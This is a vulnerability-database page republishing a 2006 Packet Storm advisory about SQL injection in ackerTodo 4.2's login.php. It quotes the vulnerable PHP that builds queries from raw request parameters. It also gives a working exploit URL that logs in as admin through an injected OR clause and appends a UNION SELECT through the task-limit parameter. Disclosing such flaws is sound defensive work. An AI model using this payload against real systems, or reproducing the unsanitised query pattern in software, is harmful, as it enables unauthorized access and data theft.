Lucene search

ackerTodo42.txt

🗓️ 12 Oct 2006 00:00:00Reported by Francesco LauritaType

packetstorm🔗 packetstormsecurity.com👁 11 Views

SQL Injection in ackerTodo 4.2 Logi

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`ackerTodo 4.2 SQL Injection  
vendor: http://ackertodo.sourceforge.net/site2/index.html  
File: gadget/login.php  
  
Exploiting this issue could allow an attacker to access sensible data.  
  
Vuln code:  
$user_login = trim($_REQUEST['up_login']);  
$user_pass = trim($_REQUEST['up_pass']);  
$num_tasks = trim($_REQUEST['up_num_tasks']);  
  
and after...  
$result = db_query("SELECT * FROM ".$table_prefix."users "  
."WHERE login='$user_login' "  
."AND password=md5('$user_pass')");  
  
and after...  
  
$sql = $sql . ' LIMIT ' . $num_tasks;  
  
Exploit:  
http://site.com/gadget/login.php?up_login=admin&up_pass=wrongpass')%20or%20(%20'1'%20=%20'1'%20AND%20login%20=%20'admin&up_num_tasks=100%20UNION%20select%20*%20FROM%20tasks  
  
Vendor has been informed and a patch has been committed into cvs  
  
Regards  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

12 Oct 2006 00:00Current

7.4High risk

Vulners AI Score7.4

ackertodo 4.2; sql injection; login; vendor; sensible data; vulnerability; patch; cve-2022; security